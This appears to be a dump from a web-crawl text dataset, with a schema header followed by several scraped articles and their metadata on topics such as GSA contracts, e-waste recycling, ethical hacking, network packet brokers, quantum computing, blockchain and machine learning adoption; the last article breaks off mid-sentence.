text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
President Harry S. Truman founded the General Services Administration, or GSA, in 1949 to streamline the federal government’s administrative duties. The initial goal and function of a GSA contract with federal government were to dispose of war surplus commodities, manage and preserve government archives, handle emergency preparedness, and stockpile strategic supplies for warfare. Still, it has given way to a much broader purpose. GSA now functions as the federal government’s purchasing arm, facilitating the acquisition of goods and services for thousands of federal agencies and offices. This article will explore what is within a GSA Contract with Federal Government. What is a 5-year GSA Contract with Federal Government? First and foremost, GSA provides federal agencies with a wide range of products and services that they require to serve the general public. The GSA Schedules initiative gives the government, and commercial partners reduced lead times and more transparency. The Federal Acquisition Service (FAS) provides a wide range of products and services to the federal government at the best possible price. Companies interested in a GSA Multiple Award Schedule (MAS) contract must submit a proposal that meets the requirements of the current GSA solicitation, which varies based on the products or services the vendor wishes to provide to the government. GSA Schedules are open enrollment, which means that businesses can apply at any time, allowing them to enter the federal market whenever they are ready. Click here to calculate ROI! One significant distinction between selling your products and services under a GSA contract and selling commercially is that when you sell under a GSA contract, the terms and conditions have already gotten agreed upon throughout the GSA Schedule bidding process. Thus, the purchase procedure for the many federal departments in the government is made easier by having agreed-upon terms and conditions. Pricing, terms, and conditions are all negotiated during the process. If you are successful, you will receive a 5-year GSA contract with federal government, which you can extend for up to a total of 20 years. The 5-year GSA contract with federal government explains why the GSA proposal process requires so much documentation, review, and evaluation; GSA wants to ensure that its contractors can execute orders for customers in the long run. This process also informs GSA customers that contractors awarded a GSA Schedule has gotten determined to be stable and viable to sell authorized products or services to government customers for a minimum of five years, attracting government customers to the Schedules program for procurement. Where can I find a GSA Contract with Federal Government? You can utilize a variety of databases to look for a GSA contract with federal government. Similarly, government organizations employ a variety of databases to discover contractors, which fall into four categories: - Dynamic Small Business Search Government organizations use the Dynamic Small Business Search (DSBS) database to discover small business contractors for impending contracts. Small businesses can also use DSBS to connect with other small enterprises. SBA maintains the DSBS database. Because the information you supply when registering your business in the System for Award Management (SAM) gets utilized to complete the DSBS, you should develop a detailed business profile. - Contract Opportunities Contracts for more than $25,000 are listed on beta.sam.gov by government entities. There, you can find a contract that meets your company’s needs and bid on it. - GSA Schedules Securing a contract with the United States General Services Administration (GSA), the government organization that connects government purchasers with contractors, is a fantastic place to start if you want to sell to the government using your GSA contract with federal government. Obtaining a contract with the GSA is frequently referred to as “getting on the GSA Schedule.” This distinction indicates that you have gotten approved to do business with the government. - Subcontracting Opportunities The SubNet is a database of subcontracting possibilities for small firms offered by large contractors looking for subcontractors. The Small Business Administration maintains a list of federal government prime contractors with subcontracting plans. Furthermore, the GSA provides a subcontracting directory for small businesses looking for prime contractor subcontracting opportunities. The directory includes a list of large corporate prime contractors who must develop plans and objectives for subcontracting with small enterprises. Additionally, the United States Department of Defense (DoD) maintains a similar database of large prime contractors that small businesses can utilize to discover subcontracting opportunities. How much do Government Contracts Pay? The average annual wage for a Federal Contractor in the United States is $98,706 per year as of September 29, 2021. For a quick salary calculation, that comes out to be around $47.45 per hour. This math works out to $1,898 a week or $8,226 per month. While you can find annual salaries as high as $149,500 and as low as $23,000 on a large job market, the majority of Federal Contractor salaries currently range from $66,500 (25th percentile) to $139,500 (75th percentile), with top earners (90th percentile) making $147,000 annually across the United States. The typical compensation for a Federal Contractor ranges widely (up to $73,000), implying that there may be numerous prospects for growth and higher income dependent on skill level, location, and years of experience. Furthermore, according to recent job posting activity, the Federal Contractor job market throughout most states is not very active at the moment as few organizations are hiring. However, the average yearly compensation for a Federal Contractor in most regions is $98,706, the same as the national average annual salary of $98,706. While obtaining a GSA MAS contract does not guarantee government sales, it can be a useful contract vehicle for businesses to tap into the federal market and increase sales. A critical step in determining whether a GSA MAS contract is suited for you is to weigh the costs, advantages, and opportunities. Finally, settling for individual bids that you may or may not win makes little sense when obtaining a GSA contract with federal government is another far more promising option.
<urn:uuid:6d1fce75-e990-40e6-9f4b-29e87156ae18>
CC-MAIN-2022-40
https://www.gsascheduleservices.com/blog/of-a-gsa-contract-with-federal-government/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00668.warc.gz
en
0.943525
1,268
2.546875
3
What Is a Disaster Recovery Plan? A disaster recovery plan defines instructions that standardize how a particular organization responds to disruptive events, such as cyber attacks, natural disasters, and power outages. A disruptive event may result in loss of brand authority, loss of customer trust, or financial loss. The plan is a formal document that specifies how to minimize the effects of disaster scenarios, and help the organization minimize damage and restore operations quickly. To ensure effectiveness, organize your plan by the location and the type of disaster, and provide simple step by step instructions that stakeholders can easily implement. Disaster recovery plan examples can be very useful when developing your own disaster recovery plan. We collected several examples of plans created by leading organizations, and a checklist of items that are essential to include in your new plan.
<urn:uuid:c33fbe12-0853-44a6-afef-b99e36199760>
CC-MAIN-2022-40
https://cloudian.com/guides/disaster-recovery/4-disaster-recovery-plan-examples-and-10-essential-plan-items/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00668.warc.gz
en
0.926022
161
2.53125
3
What are the Different Responsible Electronics Recycling Options Available? American households own an average of 24 electronics. The recent years have been revolutionizing the way we access information, communicate, and get entertained through the use of different kinds of electronics. They drive the modern corporate world as well, and most businesses cannot even imagine sustaining without them. However, we cannot turn a blind eye to the casing, compounds, and chemicals that go into their production and are harmful to the environment. It is high time that we, as accountable citizens, embrace responsible electronics recycling. E-cycle electronic recycling does not rip you off even the most little of the utility you can potentially extract out of your electronic devices. It only requires you to perform electronic waste recycling in a responsible manner, which will help create a sustainable future and protect the environment. Organizations need to check their computer recycling management systems to ensure they are in line with responsibility standards. The best way to do that is to partner with a responsible and certified recycler, like CompuCycle. Why is Responsible Electronics Recycling Important? Each year, 41.8 million tons of e-waste are disposed of in ways that harm the environment. Only 12.5% of electronics are subjected to proper tech recycling. The reasons why you should care about where your end-of-life electronic equipment ends up are abundant. The manufacturing of electronics requires chemicals, compounds, and materials, that deplete our natural resources. Furthermore, they contaminate the soil, water and damage the earth’s environment after they are disposed of in landfills. By opting for responsible electronics recycling, you not only keep these materials from harming the natural ecosystem but allow valuable and scarce materials, such as silver, aluminum, gold, titanium, tin, and copper, to be reused for the manufacturing of other products as well. What are the Different Responsible E-waste Recycling Options Available? Whether you are an individual or a business owner, there are proper ways available for you to deal with all the end-of-life and outdated electronics. Responsible electronics recycling demands that you subject your devices to a circular electronics system. This means that you allow for any value that is left in your devices to be extracted out of it. If it is in working condition, it can be resold for reuse after going through certain processes. Responsible Recycling (R2) requires that electronics that have all or some of their functions running be carefully tested and refurbished before they can be re-marketed. If an electronic device is not reusable, it should be shredded, and all the valuable substances it consists of should be collected and reused in the production of other goods. There is a one-stop, specialized place for all these processes, which is CompuCycle. It is an electronics recycling company that is R2 certified. This means that all its processes are compliant with electronic waste recycling regulations and that it performs safe and secure practices for the destruction, recycling, and disposal of all electronics. CompuCycle is an experienced and expert organization that carries out computer hardware recycling and other electronics recycling. Houston is their hometown facility, but they collect anywhere in the United States. You can contact CompuCycle to schedule a pickup of all the obsolete electronics at your workplace or bring them directly to their facility located at 8019 Kempwood, Houston, TX 77055. They not only carry out responsible e-waste recycling for your business but also offer you great value for your reusable devices. By hiring the company, you can attain peace of mind that you are staying compliant with all the legal recycling obligations as well as the ethical ones. What Should Be Your Next Step? There are a number of electronics recycling companies that offer e-waste recycling services. The key is to go for one that is certified and credible, like CompuCycle. You need to visit a dedicated electronic waste recycling service’s website and check out the list of electronics they accept. It is our responsibility to make sure to never throw away any of those sophisticated electronics in the trash. Get in touch with the company and schedule a pick-up of your e-waste or opt for their mobile service. They will securely wipe or destroy all your sensitive and confidential data and information stored on the devices while following the best practices and environmental-friendly processes. They also provide you with Certificates of Recycling and Certificates of Hard Drive Data Destruction as proof that all your data was securely destroyed and that they carried out responsible e-waste recycling. All of the information is also indefinitely stored in your company’s portal so it can be retrieved at any time for your company’s needs or audits. Whether it is computer hardware recycling, computer recycling, or other electronics recycling, the responsibility lies on you to be a smart consumer and subject the end-of-life electronics you own to only responsible electronics recycling.
<urn:uuid:00dbebb4-b0d7-45be-88e5-c66c30e2dcf1>
CC-MAIN-2022-40
https://compucycle.com/blog/responsible-electronics-recycling-options/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00668.warc.gz
en
0.95026
1,011
2.96875
3
Ethical hacking is a term used to refer to legal, authorized efforts by hackers to find security vulnerabilities within computer systems. It is sometimes also referred to as “penetration testing” or “pen testing.” Ethical hackers are security experts who attempt to break through cybersecurity in the same ways that a malicious hacker might. They are sometimes called “White Hats,” a reference to old Western movies in which the good guys could always be easily identified by the white cowboy hats they wore. Ethical hacking allows companies to stay ahead of potential threats by thinking like a criminal might. By employing an ethical hacker to reveal cybersecurity holes that they may have missed, developers can address issues before malicious hackers have a chance to exploit them. Ethical hacking vs. malicious hacking Hackers of all kinds use the same set of skills. However, there are fundamental differences between ethical hackers and those who wish to do harm: - Take the legality of their work very seriously. - Generally work within an outlined scope and do not deviate into areas of software or networks that they are not approved for. - Report and log their findings so that their clients can assess results. - Respect the privacy of their clients and do not collect data that is sensitive. - Try to gain unauthorized access from unsuspecting victims using hidden or destructive means. - Work only for personal, financial, or political gain. - Do not report their findings and may in fact sell them to other hackers. - Seek out private information in order to sell it online or hold it for ransom. Examples of ethical hacking preventing disaster Ethical hacking is not just theoretical. Here are five examples of instances in which potential crisis was averted thanks to the skills of an ethical hacker: - A WordPress plugin called Social Network Tabs was found to leak login information associated with users’ Twitter accounts. An ethical hacker discovered the vulnerability and reported the breach, resulting in Twitter disabling the vulnerability. - An ethical hacker discovered that security flaws in a crew information system used on Boeing 787 aircrafts could be misused if its code was grabbed by cybercriminals. - A flaw was discovered in Visa’s contactless payment system that could allow those with stolen credit cards to bypass payment limits. - An ethical hacker discovered that a vulnerability in one of Canon’s high end cameras could be used by an attacker to lock up the device and then demand a ransom in order to use it again. - A vulnerability was discovered in Zoom that would allow malicious websites to initiate Mac users’ webcams and even forcibly join Zoom calls. Do all companies use ethical hackers? The term “hacker” in general still carries some negative connotations. As a result, not all companies are eager to expose themselves to people who are generally freelancers or affiliated with third party security research outside of the company. However, cybercrime continues to make headlines as it grows in both scope and frequency. The tide is changing and more institutions are seeing the benefits of ethical hacking. In some cases, forward-thinking companies will hire an “in-office” hacker, although many opt to instead offer payment to outsiders who are able to circumvent their security and detect vulnerabilities in unexpected ways. Apple, in particular, is well known for its “bug bounty” program in which it rewards ethical hackers for discovering flaws in its products. How do you become an ethical hacker? The image perpetuated by crime dramas and movies of a computer whiz typing away in a dark room is hardly relevant. Hacking has reached the mainstream. From changes in pop culture references to hacking conventions such as DEF CON, computer and security enthusiasts the world over are not only coming out of the shadows but also showing themselves to be an integral part of our future’s cybersecurity. Becoming an ethical hacker is a valid career path for those with an interest in computer engineering and a desire to stop crime. There are a variety of courses available for those eager to learn how to use the tools required for the job. In addition to the necessary education and skills, white hat hackers are to follow a code of ethics. The EC Council, an organization that created the Certificated Ethical Hacker (CEH) exam, has a 19 point Code of Ethics that is meant to guide ethical hackers in their work and philosophy. You don’t have to be a hacker to maintain cybersecurity The complexities required to be an ethical hacker or cybersecurity expert are many. Thankfully, it’s not necessary to be a computer engineer to do your best to stay safe and remain vigilant when it comes to your own cybersecurity. Follow these best practices, some from white hat hackers themselves, to maintain tight security and keep your network safe from malicious hackers: - Maintain good password security by creating randomized, impossible-to-guess login credentials across all your platforms. - Do not allow your web browser to save your passwords. - Do not click links in suspicious emails attempting to scare you into doing something urgently. - Set up multi-factor identification wherever the option exists. - Set up and use a Virtual Private Network to keep your web use out of sight. - Use a firewall to protect your network from unauthorized access. - Keep your apps, operating systems, and anti-virus software up to date.
<urn:uuid:136f6142-a501-44bc-8931-a9d8879593ab>
CC-MAIN-2022-40
https://news.networktigers.com/featured/what-is-ethical-hacking-and-is-it-legal/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00668.warc.gz
en
0.941028
1,113
3.421875
3
Network Packet Broker(NPB): How Does It Differ from Network TAP? Both network packet brokers(NPB) and network TAPs are devices that monitor traffic flow and protect network security when arranged with some specific monitoring and security tools. Yet these two monitoring and security tools are different in some ways. Today we are going to explore how network packet brokers differ from network TAPs. First, let's dive into what NPB and network TAPs are and how they work. What Is A Network TAP (Test Access Point)? A network TAP is a tool that monitors traffic flow on a local network. It is typically a stand-alone hardware device that provides an access to the data and make an exact copy of the traffic flowing across the targeted network. In physical networks, a network TAP is typically deployed in a network link connected between the interfaces of two network elements, such as switches or routers, and is treated as part of the network infrastructure, similar to a patch panel. Network TAPs are the base layer of Smart Network Access and are able to monitor various events on a local network, meaning total visibility is maintained across all of the network's security and monitoring platforms, which is vital for the performance of any and all networks. Figure 1: Ports of Network TAP The network TAP has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic (send and receive data streams) through unimpeded in real time, but also copies that same data to its monitor port, enabling a third party to listen. What Is A NPB (Network Packet Broker)? NPB is a device that optimizes the traffic between TAP and SPAN connections and network monitoring, security and acceleration tool. It is also called "TAP Aggregator" or "Traffic Aggregator". It enhances the performance of network analysis and security tools, helps to optimize application performance and solve network problems. It optimizes network security and the efficiency of monitoring and analysis tools by aggregating, filtering, traffic replicating, load balancing, and more advancedly, time stamping and packet slicing. Typically, these features made network packet broker more valued and preferred by large enterprises, data centers, banks, governments and other industries that requires top network security. Network Packet Broker vs TAP, What's the Difference? Ports- TAPs copy traffic either to a single monitoring tool or, more often, to a network packet broker so they usually have only three to four ports. But network packet brokers service multiple QOS testing tools, network monitoring tools. Based on that technical requirement, a network packet broker usually has many more ports than a TAP. By maintaining a many-to-many (M:M) port mapping of network ports to monitoring ports, NPBs can direct network traffic efficiently, and filters can be applied to optimize bandwidth usage on the network. Functions- Network TAPs provide a single function of copying the traffic flowing across your network, and then send it to SPAN or other monitoring devices. While NPB is an indispensible tool for monitoring a more complicated network with various intelligent functions, including packet reduplication, aggregation, advanced filtering, packet slicing, timestamping and load balancing. Application- Network TAP is designed as a fundamental tool to acquire and copy network traffic for monitoring network traffic performance. However, network architectures are constantly becoming more complex and distributed, and so are network speeds, volumes of data, and traffic, and that is when a network packet broker was designed as a "traffic processor", to "process" the traffic intelligently according to the requirements of the monitoring and analysis devices, such as filtering, data balancing, etc. And then send the "processed" traffic to the analysis devices so as to make them work more efficiently. Both the creation of these two devices are meant to be arranged in groups with other analysis devices to monitor the traffic and ensure network security. Compared with network TAPs, network packet brokers can accomplish traffic filtering, load balancing, SSL decryption and most importantly, optimize network security and your IT investment. Based on that TAP provides embedded and integrated security on your network, a NPB gives possibility to virtually deploy tools, to help detect and shut down IT threats. The application of network packet brokers and TAPs avoids all impacts on your network functions and gain in flexibility to answer proactively to incidents.
<urn:uuid:b119d472-4bbd-478d-859d-dfb740e517cb>
CC-MAIN-2022-40
https://community.fs.com/blog/network-packet-broker-vs-network-tap.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00068.warc.gz
en
0.941877
939
2.59375
3
January 17, 2022 With rising temperatures and increasingly drier conditions in many parts of the world, fires are starting and spreading more easily than ever. Perhaps nowhere is this more evident than in California where drought and an aging electrical power grid have combined to spark one-third of the wildfires there from 2011 to 2015. But the Golden State is not alone. Stressed electrical infrastructure across the U.S. that is prone to failures is leading to massive outages and fires. Compounding the issue, utilities are contending with fluctuating demand, declining commercial usage and revenue due to the pandemic, and limitations around securing governmental approvals for rate increases that are required for modernizing power delivery equipment. These challenges and the costs of not addressing infrastructure's connection with wildfires is likely to worsen, as illustrated by data from NASA showing climate change is worsening wildfires. To complicate matters further, a wildfire in and of itself negatively impacts earth's climate by releasing massive amounts of carbon dioxide, black carbon, brown carbon, and ozone precursors into the atmosphere. These emissions affect radiation, clouds, and climate on regional and even global scales. Wildfires also emit substantial amounts of volatile and semi-volatile organic materials and nitrogen oxides that form ozone and organic particulate matter. Direct emissions of toxic pollutants can harm first responders and local residents, but, according to the National Oceanic and Atmospheric Administration, can be transported by the wind to populations in regions far away from the wildfires. There is hope, however. Utility companies rely on the payments received from customers for the electricity they use. Demand is expected to increase long-term, but recently, electricity usage served by the utilities declined, in part due to pandemic-related usage decreases in commercial and industrial customers. The addition of distributed energy generation with rising PV (photovoltaic) solar and wind energy projects also factor in, creating a dynamic supply and demand scenario that is difficult to predict and manage. The reality for energy utilities is that their fixed costs remain the same or keep rising, while the amount of money collected per Kilowatt hour (kWh) is flatlining or decreasing. And in many areas, utilities are heavily regulated, and this can limit their access to wildfire mitigating investments or critical infrastructure. This requires utility companies to come up with more cost-efficient ways to maintain their fixed-cost infrastructure so they can operate safely. To chart their course for the future, utility companies are beginning to adopt data-driven strategies that unearth areas of opportunity. Many have already adopted analytics capabilities to identify patterns in everything from usage to maintenance to better understand and plan for supply and demand, project investments, and pricing. But analytics has spread beyond traditional metrics at electrical utilities. For example, remote monitoring and IoT technologies provide advanced insights into how assets are performing by detecting environmental factors. They can then notify operational crews when assets are underperforming, overheating, have gone down or are likely to go down. Today's more advanced monitoring, data collection and data analytic tools and techniques allow us to understand how assets are performing in real time. This makes it possible to know not only how they are performing in the moment, but also how they compare to similar assets in another territory. They can help determine whether an asset-class' performance is the same everywhere, or whether some are breaking down sooner or requiring maintenance more often in one area versus another. When you layer AI and machine learning, data analytics can predict potential asset failures and allow maintenance teams to take corrective action pre-emptively. Aside from being expensive for unnecessary repairs, schedule-based maintenance creates waste and shortens the usable life of otherwise healthy equipment. Moving to analytics-based predictive maintenance helps reduce wildfire threats, enhances sustainability, optimizes supply chains and spare parts inventory management, and reduces total maintenance spend, making more money available for wise infrastructure investments. Traditional monitoring and maintenance of powerlines is currently done by taking aerial photographs and having scientists analyze photos for anomalies. It's tedious, time-consuming and imprecise. By digitalizing and automating their asset performance management, utilities can detect, react and resolve issues faster, even preemptively. One example of this is the use of drones equipped with heat-sensing cameras or video cameras. These drones can gather images of the infrastructure, which can be taken back and run through automated algorithms to detect visual anomalies that help companies understand what may be happening to each component of the infrastructure and how it is aging. Automating this visual analysis with AI-powered software speeds the process exponentially. Software can also detect variations in the energy flowing through the transmission lines in real-time. Heat signatures can indicate when equipment is showing signs of deteriorating, giving the utility company enough time to respond before an outage or incident occurs. At this point, every utility company in the world is using at least some form of analytics in their operations. As the adoption of better data collection, asset performance management and analytic tools and techniques continues, these companies will be in a better position to start minimizing the risk of wildfires caused by aging or deteriorating electric infrastructure. The electricity industry is changing rapidly as the generation and distribution of electricity becomes increasingly democratized and localized. As it does, adopting a data-driven strategy can help optimize performance and safety by automating the collection, management, and analysis of data – ultimately leading to safer, more secure infrastructure. Check out more great stories on Insights.
<urn:uuid:d3a7f060-9563-4794-8030-6a91a72ebfa1>
CC-MAIN-2022-40
https://www.hitachivantara.com/en-us/insights/down-to-wire-putting-data-to-work-to-help-minimize-wildfires.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00068.warc.gz
en
0.934506
1,104
3.578125
4
Cybrain - Fotolia Microsoft is working on a quantum computer that could be part of the Azure cloud in five years’ time. The company claims it is leading the field in a type of quantum computing called a topological qubit, which it claims is far less error-prone than rival qubit systems. “We are very close to figuring out a topological qubit. We are working on the cryogenic process to control it, and we are working on 3D nano printing,” said Todd Holmdahl, Microsoft corporate vice-president in charge of quantum computing. “Competitors will need to connect a million qubits, compared with 1,000 in our quantum computing machine. It is about quality.” The benefit of quantum computing, according to Holmdahl, is that it can compute much faster than traditional computers. “Take the RSA-2408 challenge,” he said. “If you have a very long number made up of two prime factors, it would take a billion years to crack on a traditional computer, but with quantum computing RSA-2408 could be cracked in 100 seconds.” This accelerated processing power occurs because quantum computing changes the way information is stored. “For the last 4,500 years of storing information, it hasn’t changed very much. In a transistor, we store a value of zero or one. With quantum computing you can simultaneously store zero and one,” said Holmdahl. So, while a classical binary 4-bit computer can hold one of 16 possible binary numbers from 0000 to 1111 (zero to 15 in decimal), Holmdahl said a 4-qubit quantum computer would be able to hold all combinations of binary digits between 0000 and 1111 simultaneously. It is the qubit’s ability to hold multiple numbers simultaneously that enables quantum computers to run algorithms exponentially faster than traditional, binary computers. Holmdahl said this power could be used in new areas of research, citing quantum chemistry as an example, where it could be used to identify chemical catalysts that can break down greenhouse gases in the Earth’s atmosphere or a catalyst to accelerate the nitrogen cycle to produce artificial fertilisers quicker and in a more energy-efficient way. “Quantum computing is the technology of our generation,” he said. “It will change the game. You will see courses everywhere.” Holmdahl said it was likely that people who are well-versed in linear algebra will find it easier to program quantum computers. “People steeped in machine learning will also find it easier because the maths is similar,” he added. The reason Holmdahl believes Microsoft has the edge in quantum computing is because its researchers are close to cracking what is known as a topological qubit. It is also developing a system architecture at the Niels Bohr Institute in Copenhagen, where qubits operate at just above absolute zero, at 30 millikelvin. The extreme cold minimises interference. Microsoft has also created a high-level language Q# for Visual Studio, plus it is working on a quantum computer simulator, which will run locally on a PC or on Azure. The topological qubit is the centrepiece of Microsoft’s efforts in quantum computing. Work began two decades ago in Microsoft’s theoretical research centre, when mathematician Michael Freedman joined. Freedman is renowned for his research in a field of mathematics known as topology. According to Microsoft, Freedman began a push into quantum computing 12 years ago, backed by the company’s chief research and strategy officer, Craig Mundie. At the time, Mundie said quantum computing was in a bit of a doldrums. Although physicists had been talking about the possibility of building quantum computers for years, they were struggling to create a working qubit with high enough fidelity to be useful in building a working computer. According to Holmdahl, physical qubits are error-prone so it requires roughly 10,000 of them to make one “logical” qubit – which is a qubit reliable enough for any truly useful computation. Quantum computing researchers have found that if a qubit is disrupted, it will “decohere”, which means it stops being in a physical state where it can be used for computation. According to Microsoft, Freedman had been exploring the idea that topological qubits are more robust because their topological properties potentially make them more stable and provide more innate error protection. Holmdahl said a topological qubit would have far fewer errors, meaning more of its processing power could be used for solving problems rather than correcting errors. “The more qubits you have, the more errors you have,” he said. This, in turn, means that more qubits must be connected together. According to Holmdahl, there is a theoretical limit to how much a quantum computer can scale, due to the complexity of networking all the qubits together and the error handling. “We are taking a different approach. Our error rate is three to four orders of magnitude better,” he said. Microsoft has begun to apply its quantum computing research to solve real-world problems, according to Holmdahl. For example, it has created a “quantum-inspired optimisation” to work out the lowest traffic flow in Beijing. “Classical [binary] algorithms go up and down, analysing peaks and troughs in traffic. A quantum particle can be everywhere if it is not measured. We mimic what the quantum world does, and in doing so we can solve the problem faster,” he said. In effect, the algorithm only processes low traffic signals and discards any peaks in traffic. Holmdahl said the algorithm was able to run on a standard PC and perform the optimisation far quicker than accelerated hardware. Holmdahl said he expected this technique to become increasingly used to solve computationally challenging problems more quickly, but admitted quantum-inspired optimisation would not solve all problems. “You will need a real quantum computer to tackle quantum chemistry,” he added. Over the next five years, Holmdahl said we will see the emergence of quantum computing startups and consultants who will be able to help businesses tackle computationally complex problems.
<urn:uuid:a859c53e-6aa5-4738-ba2b-b3fd341a15cf>
CC-MAIN-2022-40
https://www.computerweekly.com/news/252440763/Microsoft-predicts-five-year-wait-for-quantum-computing-in-Azure
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00068.warc.gz
en
0.942594
1,319
3.046875
3
SkytreeSkytree is a big data analytics tool that empowers data scientists to build more accurate models faster. It offers accurate predictive machine learning models that are easy to use. Features: Highly Scalable Algorithms Artificial Intelligence for Data Scientists It allows data scientists to visualize and understand the logic behind ML decisions Skytree via the easy-to-adopt GUI or programmatically in Java Model Interpretability It is designed to solve robust predictive problems with data preparation capabilities Programmatic and GUI Access Explore Data & Analytics Statistics - 59 percent of executives say big data at their company would be improved through artificial intelligence (AI). - 90 percent of IT professionals plan to increase spending on BI tools. - Businesses that use big data saw a profit increase of 8–10 percent. - 61 percent of businesses that recognize the effect of data and analytics on their core business practices say their companies either have not responded to these changes or have taken only ad hoc actions rather than developing a comprehensive, long-term strategy for analytics. - 40 percent of businesses say they need to manage unstructured data on a frequent basis. - 90 percent of the world’s data was created between 2015 and 2016 alone. - Businesses that use big data saw a 10 percent reduction in overall cost. - 45 percent of companies run at least some big data workloads in the cloud. - 73 percent of businesses consider Spark SQL critical to their analytics strategies as a big data access method. - By 2020, there will be 2.7 million job postings for data science and analytics roles. Check Out Data & Analytics Tools Recent Blogs on Data & Analytics - Data Science Powers the Data-Driven Organization of the Future - Pitfalls to Avoid when implementing Health Information Exchange - The Benefits of Data Warehousing in Finance - Data Warehouse: Keys to Success - Predictive Analytics Improve Business Outcomes for Retailers - Exploring DEV / TEST / PROD Environments in Power BI - How to Build a Data Strategy Roadmap - Implementing a Proof of Concept (POC) Approach - Implementation Fundamentals of Master Data Management - Sharing a Power BI report within Teams
<urn:uuid:90e76e93-d0cd-4c48-a172-d5b7e8d2ebda>
CC-MAIN-2022-40
https://www.dataideology.com/data/skytree/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00068.warc.gz
en
0.882824
450
2.53125
3
In the September 2019 IDentifier, I introduced the blockchain concept and explained how it provides a different and superior method of storing data relative to traditional centralized databases. In this second installment, we will adjust our focus and zoom in on the smallest common unit of the chain and explore its anatomical features. The Purpose and Anatomy of a Block Just as the cell is the smallest functioning unit of our bodies, the block is the smallest functioning unit of the blockchain. To better appreciate the structure and function of the block, let’s begin with acknowledging that a blockchain is essentially a ledger that records transactions. In that context, blocks are analogous to the pages in a ledger that record the details of individual transactions. Keeping with the ledger analogy, the purpose of each page is to record transactions. If we are looking at Bitcoin, then the transactions are financial in nature but they could just as easily be entries in a patient’s electronic health record or elements in a legal contract. So part of the anatomy of each block is dedicated to recording transaction data. You can view actual Bitcoin transaction records at https://www.blockchain.com/explorer to see how the data in that blockchain is encrypted and recorded. As you will see, each block can contain a few or many transactions. But recording transaction data is just one element in the anatomy of each block (or page.) Imagine you are working in an old-fashioned bank and you are tasked with reviewing the day’s transaction records. As you flip through the pages, you note that the page numbers jump from 34 to 40. The sudden change in page numbers alerts you to the possibility the ledger has been compromised. In the same way, each block contains features that help to ensure the data it contains is accurate and has not been tampered with. One of those elements is an alphanumeric “hash” code that refers to the previous block in the chain. Think of it as a very sophisticated and nearly impossible to replicate or guess page number. (“Hash” is a computer science term that refers to a code that encrypts data.) The point is that if this sequence is missing or inaccurate, you know the block has been compromised and that the data is likely fraudulent. For example, the transaction was for $100 and not $1,000. The final essential element of each block that serves to provide yet another data-integrity function is known as the “Merkle Tree Hash”. You recall that a hash is a result of an encryption calculation that obscures and protects the data it has encrypted. The Merkle Tree Hash is the result of the transaction data recorded in the block being processed through a series of encryption algorithms. The purpose of this process is the creation of another alphanumeric sequence that is unique to the block and the data it contains. The mathematical probability that someone could decode the hash in an effort to hack the block is infinitesimally smaller than the probability that lightning will strike you while you are in your house lying in bed at a specific date and time wearing a specific set of pajamas. To review, each block in a blockchain is comprised of three primary elements: - Transaction data - The hash code of the previous block - A Merkle Tree Hash Taken together, these elements provide an automated method of storing, securing and sharing data that has no peer. But the wonders of blockchain do not end there! In my next article, we will explore the relationship between the blocks to see even more features that further augment the power of blockchain technology to efficiently and securely share data across networks.
<urn:uuid:bed3fc38-f7ab-411f-993d-9369d95fb8a4>
CC-MAIN-2022-40
https://www.1kosmos.com/blockchain/cto-insights-october-2019-identifier/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00068.warc.gz
en
0.94335
744
3.390625
3
Much like a calculator is always going to be better than a person at basic arithmetic, there is no doubt that a program, bot, machine, etc. leveraging a well-developed machine learning algorithm is going to perform its function better than a human. So why isn’t machine learning being used everywhere? It turns out there are a myriad of social and technical considerations. If a data-driven, better performing tool is the benefit of machine-learning, then the complex and often inexplicable nature of the underlying formula is arguably the biggest downside (at least socially). People sometimes refer to it as a black box, because the formula doesn’t print out a human-readable explanation with the decision it makes. In some real sense, the formula is itself the description of why the decision was made. For a doctor, he/she can say “I made x diagnosis because of symptoms x,y,z and because you lacked symptoms a,b which would rule out other illnesses”. A human-readable version of the machine learning output would be “I made x diagnosis because of the weighting and correlation between (insert all factors here)” every time. People need explanations. They want to understand how it works, conceptually at the very least. Especially when it comes to topics that they deem to be important. If they’re going to trust a machine to make a medical diagnosis, or their car to drive itself, or a program to invest their money, it requires trust that the correct decision is going to be made. The burden of proof is exponentially higher than for other people. More than 3,000 people die in car crashes every day and it’s deemed normal. But if one self driving car hits a pedestrian, regardless of who’s at fault, there is an outcry that the machines can’t be trusted. Skepticism is healthy, but if people don’t trust it, companies have a hard time investing in it. If a doctor uses a program to help make a diagnosis and the diagnosis is wrong, who’s at fault? The doctor for trusting the diagnosis? The hospital for buying the software? The programmer of the software for making a bad diagnostic model? The providers of the diagnostic data that led to a faulty diagnostic model? What happens if you apply ML to insurance applications and the algorithm routinely declines policies to a specific sex, minority, age group? Is the company culpable for violating equality laws or can they blame it on the program? “Who’s at fault” in the event something goes wrong could have huge financial implications for ML service providers. Although the pros are starting to outweigh the cons, there is hesitation for corporations to invest in the areas where ML could provide the most value. The reality is for problems that you would want to solve with machine learning, the data sets to sufficiently train the algorithm simply doesn’t exist. Either they aren’t big enough, they are missing key factors that you expect to be relevant, they are missing key factors that you don’t expect to be relevant (think about yet undiscovered correlations like banana consumption leading to cancer), the data has quality issues such as standardization, or the data is restricted (think about data privacy 